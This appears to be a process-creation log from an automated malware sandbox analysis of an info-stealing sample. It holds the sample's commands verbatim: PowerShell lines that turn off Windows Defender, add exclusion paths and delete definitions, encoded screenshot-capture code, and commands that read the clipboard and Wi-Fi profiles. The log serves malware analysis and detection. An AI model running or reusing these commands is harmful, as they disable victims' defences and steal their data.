                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
                                  Source: unknownProcess created: C:\Users\user\cscript.exe C:\Users\user\cscript.exe
                                  Source: unknownProcess created: C:\Users\user\cscript.exe C:\Users\user\cscript.exe
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308Jump to behavior
                                  Source: C:\Windows\System32\WerFault.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAK